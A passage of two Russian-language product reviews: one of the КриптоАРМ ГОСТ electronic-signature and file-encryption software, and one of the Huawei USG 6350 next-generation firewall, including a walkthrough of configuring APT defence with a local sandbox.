КриптоАРМ ГОСТ — популярное кроссплатформенное средство российской компании «Цифровые технологии», предназначенное для создания и проверки квалифицированной электронной подписи, шифрования и дешифрования файлов с произвольным расширением на операционных системах Windows, Linux и macOS. Поддерживает стандарты ГОСТ Р 34.10-2012 и ГОСТ Р 34.11-2012. С его помощью можно придать юридическую значимость электронным документам (актам, договорам, заявлениям и т. д.) в рамках электронного документооборота. ВведениеФункциональные возможности КриптоАРМ ГОСТУстановка и настройкаРабота с КриптоАРМ ГОСТ4.1. Работа с сертификатами4.2. Создание и проверка электронной подписи4.3. Шифрование файлов4.4. Работа с документами4.5. Журнал операцийВыводы ВведениеЭлектронный документооборот является важным инструментом при реализации бизнес-процессов компании. Практически все документы создаются, хранятся и модифицируются в электронном виде. В соответствии с Федеральным законом от 06.04.2011 N 63-ФЗ (ред. от 23.06.2016) «Об электронной подписи» любая информация, хранящаяся в электронном виде и подписанная усиленной квалифицированной электронной подписью (ЭП), может применяться в любых правоотношениях наряду с документом на бумажном носителе, подписанным собственноручной подписью.Мы неоднократно рассказывали о средствах электронной подписи и шифрования файлов. Сегодня рассмотрим новый отечественный продукт — КриптоАРМ ГОСТ. КриптоАРМ ГОСТ обеспечивает возможность создания и проверки усиленной квалифицированной электронной подписи файлов с произвольным расширением.КриптоАРМ ГОСТ поддерживает большое число современныx операционных систем, таких как Microsoft Windows, macOS, Ubuntu, CentOS. Кроме того, программа также совместима с отечественными операционными системами на базе ядра Linux: Astra Linux, Альт Рабочая станция, ROSA Linux, ОС Ред, Гослинукс. В конце прошлого года были выпущены версии для мобильных ОС iOS и Android.В декабре 2018 года разработчиками КриптоАРМ ГОСТ подано заявление на включение продукта в Единый реестр российских программ для электронных вычислительных машин и баз данных. Функциональные возможности КриптоАРМ ГОСТКриптоАРМ ГОСТ предназначен для решения следующих задач:создание присоединенной либо отделенной электронной подписи;проверка и снятие электронной подписи;добавление электронной подписи к подписанному файлу;поддержка ГОСТ Р 34.10-2012 и ГОСТ Р 34.11-2012;шифрование и расшифрование произвольных файлов;удаление исходного файла после шифрования;проверка корректности выбранного сертификата;поддержка носителей Рутокен и JaCarta для хранения закрытых ключей;создание запросов на сертификат;экспорт, импорт, удаление сертификатов;подключение к облачным серверам электронной подписи КриптоПро DSS;журналирование всех операций. Установка и настройкаДля корректной работы с криптогрифическими алгоритмами по ГОСТ требуется установка криптопровайдера КриптоПро CSP версии 4.0 и выше.КриптоАРМ ГОСТ протестирован разработчиками на следующих операционных системах, на которых гарантирована ее корректная работа:Microsoft Windows 10 x64/x86;Ubuntu 16.04 x64;CentOS 7.0 x64;Альт Рабочая станция 8.0 x64;Rosa Fresh R9 x64;Rosa Enterprise Desktop (RED) X3 x64;Гослинукс 6.4 x64;macOS 10.13 x64;Ред ОС 7.1 Муром;iOS;Android.При этом не исключается возможность работы приложения на других платформах, не входящих в представленный выше перечень.Установка КриптоАРМ ГОСТ на Microsoft Windows и macOS осуществляется с помощью мастера установки, на платформу Linux — через интерфейс командной строки. Рисунок 1. Процесс установки КриптоАРМ ГОСТ на Microsoft Windows Для тестирования работы программы после первой установки предоставляется пробный период сроком на 14 дней, для криптопровайдера КриптоПро CSP демоверсия передается аналогичным образом. После истечения пробного периода без установленных лицензий КриптоАРМ ГОСТ не будет функционировать в полном объеме, из значимых функций останутся доступными проверка электронной подписи и возможность шифрования. Рисунок 2. Сведения о лицензиях на КриптоАРМ ГОСТ и КриптоПРО CSP Для работы с сертификатами необходимо установить сертификаты (корневой и промежуточные) удостоверяющего центра (УЦ) и список отозванных сертификатов. Установка сертификатов осуществляется средствами КриптоАРМ ГОСТ, КриптоПро CSP или стандартными утилитами операционной системы.Сертификаты и закрытые ключи, находящиеся на ключевых носителях (токенах), импортируются в локальное хранилище с помощью КриптоАРМ ГОСТ или средствами КриптоПро CSP. Установленные сертификаты будут отображаться в разделе «Сертификаты» в графическом интерфейсе КриптоАРМ ГОСТ. Работа с КриптоАРМ ГОСТКриптоАРМ ГОСТ имеет интуитивно понятный графический интерфейс. Главное окно содержит рабочую область и выпадающее меню, содержащее функциональные возможности программы, сгруппированные по разделам. Рисунок 3. Главное окно КриптоАРМ ГОСТРабота с сертификатамиКриптоАРМ ГОСТ считывает информацию из системного хранилища сертификатов и отображает ее в разделе «Сертификаты». Сертификаты сгруппированы по категориям со всех подключенных хранилищ криптопровайдеров.Знак ключа напротив сертификата сигнализирует о том, что к сертификату привязан закрытый ключ.Программа предоставляет подробную информацию о сертификате, а также формирует цепочку сертификатов в виде «дерева» сертификации. Рисунок 4. Отображение сведений о тестовом сертификате в разделе «Сертификаты» КриптоАРМ ГОСТ КриптоАРМ ГОСТ позволяет импортировать сертификаты:из файла (поддерживаются кодировки BASE64 и DER) в системное хранилище приложения;из КриптоПро DSS (Digital Signature Standard) в хранилище личных сертификатов.Средствами КриптоАРМ ГОСТ можно легко экспортировать сертификат в файл (в том числе вместе с закрытым ключом).Удаление сертификатов осуществляется через контекстное меню. КриптоАРМ ГОСТ позволяет выбрать, удалять ли привязанный к сертификату закрытый ключ.Пользователь может создать запрос на сертификат. КриптоАРМ ГОСТ имеет 3 встроенных шаблона запроса, по которым вводятся необходимые сведения. На основе указанных данных формируется запрос на сертификат. Для ГОСТ сертификата необходимо использовать ключевой носитель сертификата (токен, реестр, диск). Созданные запросы отображаются в разделе «Сертификаты» и могут быть экспортированы в файл для передачи на рассмотрение в УЦ. Полученный из УЦ сертификат необходимо импортировать для работы в КриптоАРМ ГОСТ.КриптоАРМ ГОСТ позволяет создавать самоподписанные сертификаты. При этом запрос на сертификат не создается и взаимодействие с УЦ не требуется. Созданный сертификат помещается в хранилище личных сертификатов. Рисунок 5. Создание запроса на сертификат средствами КриптоАРМ ГОСТСоздание и проверка электронной подписиПодпись файлов осуществляется с помощью цифрового сертификата с закрытым ключом. КриптоАРМ ГОСТ позволяет выбрать сертификат подписи из списка доступных. Рисунок 6. Выбор цифрового сертификата в окне КриптоАРМ ГОСТ для подписи файлов КриптоАРМ ГОСТ поддерживает как пофайловую подпись, так и пакетную. ЭП может быть сохранена в отдельном файле, но чаще с практической точки зрения удобнее присоединять подпись к самому файлу. Рисунок 7. Параметры генерации ЭП для текстового файла в окне КриптоАРМ ГОСТ Процесс подписи инициируется нажатием кнопки «Подписать». Файлы, содержащие ЭП, имеют расширение .sig. При этом получить доступ к содержимому файла можно только через интерфейс КриптоАРМ ГОСТ. Рисунок 8. Файл после генерации ЭП в окне КриптоАРМ ГОСТ КриптоАРМ ГОСТ предоставляет пользователю 3 действия над подписанными файлами: проверить, подписать, снять. Для проверки подписи достаточно выбрать файл и нажать кнопку «Проверить». КриптоАРМ ГОСТ позволяет задать путь до исходного файла в случае, если ЭП хранится в отдельном файле. Рисунок 9. Проверка электронной подписи средствами КриптоАРМ ГОСТ При подписи файла, содержащего ЭП, новая ЭП генерируется по выбранному цифровому сертификату с закрытым ключом и отображается в поле «Информация о подписи» интерфейса КриптоАРМ ГОСТ. Рисунок 10. Файл имеет две электронные подписи, отображающиеся в интерфейсе КриптоАРМ ГОСТ Опция снятия электронной подписи снимает все ЭП для выбранного файла. Рисунок 11. Сообщение об успешном снятии ЭП в интерфейсе КриптоАРМ ГОСТ, текстовый файл помечен как неподписанныйШифрование файловКриптоАРМ ГОСТ предоставляет функции шифрования пофайлово или пакетно. Шифрование осуществляется по цифровым сертификатам получателей шифрованных файлов, имеющих закрытый ключ. КриптоАРМ ГОСТ поддерживает разные настройки шифрования, включающие кодировки и удаление файлов после шифрования. Рисунок 12. Параметры шифрования файла в окне КриптоАРМ ГОСТ Зашифрованные файлы имеют расширение .enc. Расшифрование выполняется по закрытому ключу, связанному с сертификатом получателя файла.Работа с документамиДля сохранения результатов выполнения операций с ЭП, шифрования и расшифрования файлов в КриптоАРМ ГОСТ существует раздел «Документы». Интерфейс отображает перечень добавленных для работы файлов, а также возможные действия над ними. Для удобства предусмотрен поиск записей по символьному совпадению в списке файлов. Рисунок 13. Раздел «Документы» КриптоАРМ ГОСТЖурнал операцийЖурнал операций КриптоАРМ ГОСТ содержит сведения о действиях пользователя в программе. Для удобства предусмотрена функция фильтрации записей по параметрам. Рисунок 14. Журнал операций КриптоАРМ ГОСТ ВыводыОсновная задача КриптоАРМ ГОСТ — создание и проверка усиленной квалифицированной электронной подписи для документов. С ее помощью можно сократить временные и финансовые расходы на обмен документацией, подтвердить авторство документа. Шифрование файлов гарантирует конфиденциальность информации, хранящейся в электронном виде и передаваемой по незащищенным каналам связи, предоставляя доступ только пользователю, обладающему закрытым ключом.КриптоАРМ ГОСТ — кроссплатформенная программа с дружественным интерфейсом. Для работы программы необходим криптоконтейнер КриптоПРО CSP не ниже 4 версии, что накладывает дополнительные затраты на ее использование. Для взаимодействия с ключевыми носителями необходимо установить соответствующие драйверы.ДостоинстваКроссплатформенность — поддержка Microsoft Windows, macOS и Linux, iOS, Android.Поддержка стандартов ГОСТ Р 34.10-2012, ГОСТ Р 34.11-2012 для хеширования и электронной подписи.Интуитивно понятный интерфейс, документация и поддержка на русском языке.Дополнительная возможность шифрования файлов для их безопасной передачи по открытым каналам связи.Поддержка современных ключевых носителей.НедостаткиОбновленный интерфейс может вызвать трудности у неподготовленного пользователя.Для работы требуется наличие СКЗИ КриптоПро CSP со своей лицензией.
Обзор Huawei USG 6350 — eдиного шлюза безопасности нового поколения
March 11, 2019, 11:48 pm

Huawei USG 6350 — шлюз безопасности нового поколения, входящий в линейку продуктов серии USG 6000. Он обеспечивает защиту приложений, обнаружение и предотвращение вторжений, поточную антивирусную защиту, локальную/облачную песочницу (находится в России), интеллектуальную систему кибербезопасности (CIS), фильтрацию по URL. Кроме основных возможностей Huawei USG 6350 обладает множеством дополнительных функций: аутентификация в домене, VPN, SSL-дешифрование, управление шириной канала для отдельных пользователей и т. д. ВведениеХарактеристики Huawei USG 63502.1. Архитектура и производительность2.2. Функциональные возможности2.3. Типовые варианты установки и настройкиРабота с единым шлюзом безопасности Huawei USG 63503.1. Настройка защиты от таргетированных атак (APT-defence) с подключением к локальной песочнице (через веб-интерфейс)Выводы ВведениеСегодня рынок информационной безопасности вынужден из года в год ускоряться, чтобы успевать реагировать на изощренные хакерские атаки. Уже недостаточно того, что межсетевые экраны, в том числе нового поколения, просто могут фильтровать, начиная с сетевого уровня и заканчивая уровнем приложений. Они должны уметь надежно справляться с большим объемом сетевого и облачного трафика, при этом учитывать необходимость своевременно обнаруживать и предотвращать атаки, несмотря ни на какие сложности, например, применение VPN или TLS-шифрование трафика (для решения применяется технология дешифрования, по сути, легальная MITM-атака SSLsplit — подмена сертификата настоящего на созданный в NGFW, что позволяет заглянуть внутрь шифрованного соединения).Также не стоит забывать, что для большего покрытия рынка на территории Российской Федерации необходимо иметь сертификат ФСТЭК России. Наличие его является несомненным плюсом для межсетевого экрана следующего поколения, разработанного зарубежной компанией. Немногие межсетевые экраны следующего поколения обладают подобной сертификацией.На момент написания статьи линейка продуктов Huawei USG (рисунок 1) получила положительное заключение о возможности сертификации во ФСТЭК России. Поэтому в скором времени Huawei USG получит статус сертифицированного продукта. Рисунок 1. Линейка продуктов Huawei USG 6000 Series Кроме вышеперечисленных тенденций стоит учитывать также постоянно появляющиеся векторы атак на сеть и приложения предприятия. Враг может не только атаковать снаружи, но и затаиться внутри периметра. Именно поэтому Huawei разработал и внедрил в свои продукты, несомненно, полезную функциональность — модуль обработки больших данных (Cybersecurity Intelligence System Internetworking), предназначенный для обнаружения и блокирования подозрительной пользовательской активности, с применением механизмов машинного обучения (ML), ACTUAL — набор модулей позволяющих идентифицировать и блокировать сетевой трафик по таким параметрам как тип приложения, содержимое, время, конкретный пользователь, подозрение на атаку, местоположение (рисунок 2). Рисунок 2. Основные функции Huawei USG Как мы видим из тенденций развития устройств нового поколения, Huawei USG в первом приближении соответствует заявленным ожиданиям рынка. Чтобы в этом убедиться, разберем более подробно архитектуру и функциональные возможности. Характеристики Huawei USG 6350Итак, мы уже выяснили, что модели линейки Huawei USG, в частности модель 6350 (рисунок 3), по заявлению разработчиков, обладают гибкой, масштабируемой архитектурой и развитой функциональностью. Рисунок 3. Внешний вид и элементы интерфейса моделей линейки Huawei USG Интерфейсы:USB портКонсольный порт1 x GE (RJ45) Management Port4 x GE (RJ45) Ports2 x GE (Combo) PortsКрасным на рисунке 3 выделана область, в которой на месте заглушек можно поставить плату расширения сервисных интерфейсов (WSICs). В зависимости от потребностей организации можно установить разные комбинации дополнительных интерфейсов: 2 x 10 GE (SFP+), 8 x GE (RJ45), 8 x GE (RJ45), 8 x GE (SFP), 4 x GE (RJ45) BYPASS.Если ориентироваться на официальную документацию и предоставленный для изучения стенд, можно однозначно сказать о наличии множества функций, которые есть в любом другом устройстве подобного класса. Например, защита приложений (Application Firewall), модуль обнаружения и предотвращения вторжений (IDS\IPS), антивирусный модуль, URL-фильтрация, песочница (у функциональности sandbox есть определенное преимущество, об этом чуть дальше).Однако при более детальном рассмотрении можно выделить особенные, а в некоторых случаях и уникальные фичи обозреваемого NGFW.Сразу оговоримся, что есть функции и возможности в чистом виде сетевые (не относятся к кибербезопасности), однако их наличие позволяет сделать продукт более гибким и встраиваемым в инфраструктуру. А также есть исключительно security-функции. Рассмотрим их в разделе «Функциональные возможности».Архитектура и производительностьДля обнаружения и контроля безопасности на уровне приложений требуется высокопроизводительная аппаратная платформа. Возможность ввода-вывода и производительность центрального процессора традиционных аппаратных платформ не могут соответствовать требованиям.На этом фоне разработчики межсетевых экранов следующего поколения вынуждены искать оптимальные варианты аппаратной платформы для эффективной борьбы с новыми угрозами безопасности, которая максимально соответствовала бы предъявляемым требованиям.Для продуктов рынка информационной безопасности может быть применена такая архитектура как x86, сетевой процессор (NP), специализированная интегральная схема (ASIC) или многоядерная система на чипе (SOC).Проанализировав характеристики аппаратных архитектур и сравнив их с точки зрения гибкости и производительности, в Huawei выбрали для линейки USG 6000 многоядерную систему на чипе (SOC). Рисунок 4. Внутренняя архитектура аппаратной платформы межсетевых экранов следующего поколения Huawei USG Представленная в продуктах платформа, разработанная Huawei (рисунок 4), для продуктов безопасности кроме 64-битного многоядерного MIPS процессора включает в себя аппаратное ускорение на со-процессоре, высокоскоростную коммутационную матрицу (Switch Fabric). Для реализации связи между многоядерным процессором, модулями обработки и интерфейсами используется высокоскоростная шина.Применяемый дизайн архитектуры платформы повышает производительность и надежность разрабатываемого на этой базе оборудования (Таблица 1). Таблица 1. Выборка устройств из линейки Huawei USG 6300 (характеристики и производительность) USG 6350USG 6650USG 6680Пропускная способность межсетевого экрана IPv4 (1518/512/64-byte, UDP)2/2/0.4 Гбит/с20/20/8 Гбит/с40/35/8 Гбит/сПропускная способность межсетевого экрана IPv6 (1518/512/84-byte, UDP)2/2/0.5 Гбит/с20/20/8 Гбит/с40/35/8 Гбит/сПропускная способность связки FW + SA + IPS950 Мбит/с8.8 Гбит/с15 Гбит/сКоличество одновременных сессий (HTTP1.1)2,000,0008,000,00012,000,000Подключение новых сессий в секунду (HTTP1.1)30,000300,000400,000Пропускная способность IPsec VPN(AES-128 + SHA1, 1420-byte)800 Мбит/с15 Гбит/с18 Гбит/сВиртуальные межсетевые экраны (по умолчанию/максимум)10/5010/50010/1,000Наработка на отказ11 лет12 лет12 лет Кроме того, подобная архитектура позволила в линейке продуктов USG 6000 реализовать совершенно новый и отличный от традиционных механизмов обнаружения угроз подход, который был назван Intelligence Aware Engine (IAE). Стандартный метод обнаружения атак в классических межсетевых экранах заключается в сопоставлении каждого пакета с базой сигнатур. Как показывает практика, такой способ не всегда срабатывает, особенно на новые нестандартные виды атак. Механизм Intelligence Aware Engine работает иным образом, а именно повторно собирает информацию о пакетах на основе сеансов, анализирует протоколы, сопоставляет сигнатуры, специфичные для конкретного протокола. Сбор подобной статистики осуществляется на так называемых больших данных с применением машинного обучения, что позволяет более точно детектировать атаки.При подготовке обзора в ходе изучения продукта тестирование производительности не осуществлялось ввиду отсутствия технической возможности провести полноценные нагрузочные тесты. Однако заявленная высокая производительность — это не просто слова. Эффективность правильно подобранной аппаратной архитектуры была подтверждена в ходе сертификационных испытаний такими независимыми организациями по тестированию на производительность и функциональность, как NSS Labs и ICSA Labs.Функциональные возможностиРанее у продуктов из линейки Huawei USG 6000 уже было отмечено наличие как характерных для большинства межсетевых экранов функций, так и уникальных. Это стало возможным благодаря применению собственных научных наработок Huawei, а также модификации классических методов защиты информации.Перед рассмотрением специфических функций и возможностей ознакомимся в целом с интерфейсами взаимодействия (веб- и командная строка).Для первичной настройки и подключения к межсетевому используется management-интерфейс. По умолчанию установлен IP-адрес 192.168.0.1/24, логин — admin, пароль — Admin@123. После подключения через браузер и осуществления ряда базовых настроек откроется стартовая страница, на которой будет выведена панель управления, с графиками и статусами состояния устройства (рисунок 5). Рисунок 5. Панель управления Huawei USG 6350 Если кликнуть на Управление функциями (Function Customization), откроется список отображаемых на стартовой странице графиков и настроек. В нашем случае выбрано максимальное количество отображаемых функций. Все мы перечислять не будем — их много. Наиболее интересными показались возможности выводить в реальном времени (период обновления устанавливается в секундах) статистику по разным модулям, нагруженность на устройство, а также визуализация интерфейсов на аппаратной части (рисунок 6). Рисунок 6. Визуализация схемы подключения устройств (логическая схема) Huawei USG 6350 После внесения изменений не стоит забывать нажимать в правом верхнем углу кнопки Commit и Save, в противном случае все вносимые изменения не применятся и не сохранятся (относится к любым настройкам).Стоит отметить, что для сторонников работы с устройствами через командную строку вендор включил прямо в веб-интерфейс Командную консоль (CLI Console), для открытия необходимо кликнуть на ярлычок в правом нижнем углу (рисунок 7). При этом консоль представляет собой полноценный инструмент настройки. Рисунок 7. Командная консоль Huawei USG 6350 После подключения и знакомства с интерфейсами самое время рассмотреть более детально ранее упомянутые функциональные возможности. В таблице 2 представлен общий свод функций и их краткое описание. Таблица 2. Краткое описание функций Huawei USG 6350Функция (общее название)Краткое описаниеКонтекстный/глубокий анализ (context awareness)ACTUAL (приложение, контент, время, пользователь, атака, местоположение) — изучение содержимого трафика на основе этих метрик увеличивает качество обнаруженияВосемь методов аутентификации (локальный, RADIUS, HWTACACS, SecureID, AD, CA, LDAP и Endpoint Security)Безопасность приложений и сервисов (application security)Детальная идентификация более 6000 прикладных протоколов. Сочетание идентификации приложений и использование сканирования на вирусы в потоке позволяет точно определять различного рода вредоносные программы. А сочетание идентификации приложений и контентного анализа обеспечивает функциональность системы предотвращения утечки информацииОбнаружение и предотвращение вторжений (intrusion prevention)Модуль обнаружения и предотвращения вторжений лицензируется отдельно, как и другие дополнительные компоненты. Содержит в своей базе более 6000 сигнатур для обнаружения атак. Вылавливает потенциальные атаки на основе поведенческого анализа. Может работать в режиме IPS — блокировка вторжений. Поддерживает режим защиты от таргетированных атак (APT-defence).При необходимости можно настроить интеграцию с песочницей для обнаружения и блокирования вредоносных файлов в сетиБезопасность веб-протоколов и приложений (web security)Благодаря данной функции можно настроить подключение к облачной базе откатегорированных URL, содержащей более 120 млн URL, разбитых на 130 категорий. Реализует защиту от атак на веб-приложения, например SQL-инъекции и межсайтовый скриптинг (классический WAF-модуль).Можно настроить подмену сертификата для декрипта (расшифровки) трафика по защищенным TLS-шифрование протоколам, например HTTPS, FTPS и т. д.Безопасность электронной почты (email security)Поддерживает работу антиспам-модуля в режиме реального времени для обнаружения и фильтрации фишинговых писем. Можно создать локальный белый и черный список, использовать удаленные черные списки в реальном времени. Настраивать контентную фильтрацию, в том числе по ключевым словам, вложению, размеру, хэш файла.Доступна настройка уведомлений по электронной почте (POP3/SMTP/IMAP)Защита от утечки чувствительной и конфиденциальной информации (data security)Помогает избежать утечек конфиденциальной или любой другой чувствительной информации за счет контекстного анализа применяемых в организации передачи данных каналов.Возможно вылавливание и восстановление из потока данных файлов для их изучения более чем 30 типов (в том числе Word, Excel, PPT, PDF) и возможность фильтрации/блокирования файлов более чем 120 типовСетевая безопасность (network security)Помогает защитить от более чем 10 типов распределенных атак на отказ в обслуживании (DDoS), например, SYN-flood, memcashed amplification, UDP-flood и т.д.Также возможна настройка различного рода каналов по типу виртуальных частных сетей (IPSec VPN, SSL VPN, L2TP VPN, MPLS VPN, GRE). Или можно организовать на базе разработанного Huawei VPN-клиента SecoClient, способного строить защищенные каналы через SSL VPN, L2TP VPN, L2TP поверх IPSec VPNМаршрутизация (routing)Позволяет использовать Huawei USG не только в качестве межсетевого экрана, но и как полноценный шлюз, умеющий обрабатывать различные протоколы.IPv4: статическая маршрутизация, RIP, OSPF, BGP, and IS-IS IPv6: RIPng, OSPFv3, BGP4+, IPv6 IS-IS, IPv6 RD, and ACL6Режимы работы и повышение отказоустойчивости/доступности (working mode and availability)Позволяет создавать высоконагруженные, отказоустойчивые шлюзы с возможностью балансировки нагрузки, в прозрачном/маршрутизируемом/гибридном режиме работы.Доступны схемы настройки, когда оба устройства в активном режиме, либо одно в активном, а второе в резервеИнтеллектуальное управление (intelligent management)Именно эта функция реализует так называемый режим Cybersecurity Intelligence System (интеллектуальный модуль кибербезопасности). Позволяет оценивать сетевые риски на основе собираемой статистики проходящего трафика. Может создавать на основе полученных данных новые политики и оптимизировать ранее созданные Из приведенной таблицы видно, что функциональность продуктов данной линейки широкая и разноплановая. Ниже рассмотрим наиболее интересные с нашей точки зрения и по заявлениям вендора функции и возможности.Песочница может быть, как локальной на базе устройств Huawei Firehutner или облачной. Интерфейс настройки подключения песочницы к USG 6350 представлен на рисунке 8. Оба варианта являются разработкой Huawei, сторонние песочницы не поддерживаются, вполне логичная политика, как и у большинства вендоров. Облачная песочница у Huawei развернута на территории РФ (Москва), запущена в ноябре 2018 года. Это является несомненным конкурентным преимуществом, так как облачная песочница на территории РФ есть только у Huawei. У конкурирующих разработчиков средств защиты подобного класса ЦОДы с облачной песочницей находятся за рубежом (Израиль, Германия, США и т. д.). Рисунок 8. Настройка подключения песочницы в интерфейсе Huawei USG 6350 CIS (интеллектуальная система кибербезопасности) — по сути это Big-data-система, которая собирает в себя данные отовсюду в сети (ранее это отмечалось в таблице 2). Система проходится моделями угроз, сигнатурами, поведенческими моделями по трафику и дает результат (с применением машинного обучения) о найденной уязвимости. Если на каком-то будет обнаружена подозрительная сетевая активность (потенциально вредоносная по заключению системы), то на межсетевой экран поступит команда заблокировать зараженный хост, который в результате попадает в черный список. Интерфейс настройки подключения CIS к шлюзу безопасности представлен на рисунке 9. Рисунок 9. Настройка модуля интеллектуальной системы кибербезопасности CIS Huawei USG 6350 Интеграция с CIS в новой версии также позволяет настроить на шлюзе безопасности USG в режиме flowprobe (то есть вытаскивать из трафика нужные данные — DNS, HTTP и пр. заголовки и отправлять на CIS) (рисунок 10). Рисунок 10. Настройка режима flowprobe в Huawei USG 6350 Выше мы упоминали особенные, отличительные функции и возможности Huawei USG 6350. Рассмотрим их:поддержка MPLS — многопротокольная коммутация по меткам;функция квотирования по пользователям/группам. Можно ограничить на определенное количество трафика (например, 1 Гб в день) пользователю из AD, а если лимит исчерпан, то либо урезать полосу пропускания, либо вообще заблокировать доступ в интернет;поддержка DSVPN. Аналог DMVPN у Cisco. Поддержка есть только у Huawei и Cisco. Однако DSVPN по сравнению с применяемым в Cisco DMVPN имеет преимущество. Оно заключается в том, что у Cisco при помощи данной технологии можно объединить только маршрутизаторы (межсетевые экраны ASA/Firepower не поддерживаются). Технология DSVPN от Huawei в свою очередь позволяет объединять как маршрутизаторы, так и межсетевые экраны нового поколения. То есть можно получить смешанную сеть на AR (маршрутизаторы) и USG (межсетевые экраны). Подобное может пригодиться, когда в филиалах без интернет-доступа достаточно AR, а в филиалах с интернетом хорошо подходит USG для настройки безопасной схемы работы;встроенная поддержка балансировки (SLB) в базе. Можно опубликовать один IP-адрес вовне и балансировать между несколькими серверами внутри. Присутствует функция Health Check на основе ICMP/TCP/HTTP протоколов. В случае выхода из строя сервера — он выводится из группы балансировки;встроенная базовая защита от DDoS на L4 уровне включая механизмы машинного обучения для лучшей сработки.Типовые варианты установки и настройкиРассмотрим варианты развертывания, которые можно отнести к типовым. Ниже на рисунке 11 можно увидеть комбинированное применение для защиты различных сегментов корпоративной сети, терминальных подключений и облачных сервисов, размещенных в дата-центре. Рисунок 11. Типовые варианты развертывания Huawei USG 6350 Теперь немного подробнее о каждом из вариантов:Разграничение внутреннего периметра (интранет) с помощью межсетевого экрана нового поколения позволяет:разграничить доступ на уровне пользователей;создавать политики контроля мобильных пользователей, управлять их доступом и логировать события;настраивать контентную фильтрацию и аудит проходящих электронных сообщений, переписки в мессенджерах и социальных сетях, тем самым предотвращая потенциальные утечки информации.Можно настроить защиту от неавторизованного доступа в интернет с рабочих мест, в частности:категорирование URL, блокировка нежелательных приложений и расширений, что повышает защиту от зловредных и потенциально опасных веб-ресурсов;настройка правил, влияющих на качество обслуживания (QoS), за счет выделения из общей массы наиболее приоритетных пользователей и сервисов.Можно использовать устройства из данной линейки для защиты периметра облачных дата-центров:за счет внедрения механизмов предотвращения вторжений, дифференцирования защитных функций для каждой конкретной виртуальной системы;за счет включения anti-DDoS.Организация удаленных VPN-подключений, с возможностью TLS-шифрования канала. Работа с единым шлюзом безопасности Huawei USG 6350В предыдущих разделах обзора мы рассмотрели множество функций и возможностей линейки продуктов Huawei USG на примере модели 6350. Несомненно, продукт интересный, но, чтобы понять, насколько легко управлять и настраивать устройства подобного класса, приведем практический пример настройки.В качестве подопытной выбрана функциональность защиты от таргетированных атак (APT-defence) с подключением к локальной песочнице.Настройка защиты от таргетированных атак (APT-defence) с подключением к локальной песочнице (через веб-интерфейс)Настройку этой функциональности, как и любой другой, рекомендуется начинать с небольшого планирования: отрисовать схему, зафиксировать информацию об используемых сетевых портах и IP-адресах. Рисунок 12. Схема работы APT-модуля Huawei USG 6350 в связке с локальной песочницей FireHunter Как показано на рисунке 12, корпоративная сеть подключается к интернету через наш межсетевой экран и имеет локальную песочницу. USG 6350 взаимодействует с локальной песочницей в случае если настроено обнаружение вредоносных URL-адресов и обнаружение файлов по репутационным спискам. В этом случае трафик сопоставляется с ранее кэшированным вредоносным URL-адресом и записями о потенциально вредоносных файлах:если трафик исходит с вредоносного URL-адреса, Huawei USG 6350 блокирует трафик; если трафик соответствует вредоносному файлу, устройство выполняет указанное в правилах действие. В любом случае трафик не нужно отправлять в безопасную среду для проверки;если потенциально опасный трафик, определенный Huawei USG 6350, не соответствует вредоносному URL-адресу или вредоносному файлу, он отправляется в локальную песочницу для проверки.Межсетевой экран периодически получает результаты проверки файлов из FireHunter, обновляет списки потенциально вредоносных файлов и URL-адресов. Если в дальнейшем трафик будет соответствовать вредоносному URL-адресу или файлу, будет произведено действие, прописанное в политиках модуля защиты от таргетированных атак, например блокирование. Тем самым мы обезопасим пользователей интрасети от APT-атак.После того как мы подготовились и полностью понимаем, как будет работать наша система в целом, приступим к непосредственной настройке. Начнем с добавления политик для работы с песочницей при выходе пользователей корпоративной сети в интернет. Для этого перейдем в раздел Policy > Security Policy > Security Policy. Как ранее мы отмечали, нужно создать две политики, назовем одну Access to Local Sandbox (с параметрами, указанными на рисунке 13), вторую — Access to Internet (с параметрами, указанными на рисунке 14). Рисунок 13. Добавление политики взаимодействия с локальной песочницей в Huawei USG 6350 Рисунок 14. Добавление политики доступа пользователей корпоративной сети в интернет в Huawei USG 6350 Затем настроим подключение локальной песочницы в разделе System > Setup > Sandbox > Local Sandbox (рисунок 15). В ходе заполнения полей были указаны IP-адрес, API-Key (по сути идентификационный пароль для доступа с USG на FireHunter), протокол взаимодействия и сертификат локальной песочницы. Также можно указать ограничения по размеру файлов, которые будут передаваться на анализ (обратите внимание, что есть ограничение, и оно вполне обосновано, так как файлы большого размера могут значительно повлиять на производительность средств защиты). Рисунок 15. Настройка подключения к локальной песочнице в Huawei USG 6350 Примечание: стоит обратить внимание, что сразу подключиться к песочнице не удалось, возможно, это было связано с тем, что не был настроен модуль защиты от таргетированных атак (APT-defence). Отметим, что сразу после его настройки все заработало.Приступим к настройке следующего модуля, который предназначен для защиты от целевых атак и работает совместно с песочницей. Для этого перейдем в другой раздел — Object > Security Profiles > APT Defense:Нажимаем Add;Задаем имя и описание профиля;Далее в профиле необходимо включить различные методы обнаружения, в нашем случае будет все в одном профиле:Malicious URL Detection — анализирует и в случае необходимости блокирует доступ к потенциально зловредным URL;File Reputation Detection — контролирует передачу данных по определенным протоколам, в зависимости от указанного направления (входящий/исходящий трафик) и применяет настроенные в профиле действия (блокировка, уведомление либо удаления вложения) к потенциально зловредным файлам. По умолчанию выбраны все протоколы (рисунок 16);Sanbox Detection — при включении данной опции будут определены параметры, по которым принимается решение инспектирования обнаруженных в потоке данных файлов. В настройках стоит обратить внимание на большой список поддерживаемых расширений файлов: bat, jar, 7Z, cab, docx, msi, vbs. html и т. д. (рисунок 17). Рисунок 16. Настройка профиля для модуля защиты от целевых атак в Huawei USG 6350 Рисунок 17. Настройка раздела Sandbox Detection в Huawei USG 6350 На следующем шаге необходимо прописать ссылку на созданный профиль APT defence в политиках безопасности, для этого выберем Policy > Security Policy > Security Policy. В списке находим ранее созданную политику доступа в сеть интернет (Access_to_Internet) и модифицируем раздел APT defence (рисунок 18). Рисунок 18. Модификация политики безопасности в Huawei USG 6350 После того как мы настроили все необходимые параметры, настало время проверить песочницу и модуль защиты от целевых атак в деле. Перейдем обратно в раздел System > Sandbox > Local Sandbox, там мы увидим статус успешного подключения к локальной песочнице (рисунок 19). Рисунок 19. Статус подключения к локальной песочнице в Huawei USG 6350 Пропустим через реализованную схему потенциально вредоносный файл и посмотрим результаты работы локальной песочницы FireHunter. Веб-интерфейсе локальной песочницы мы видим результаты срабатывания, которые можно детализировать (рисунки 20, 21). Рисунок 20. Информационное табло локальной песочницы в Huawei USG 6350 Рисунок 21. Детализированная информация по срабатываниям локальной песочницы в Huawei USG 6350 ВыводыУчитывая намеченные достаточно давно тенденции в развитии рынка NGFW- и 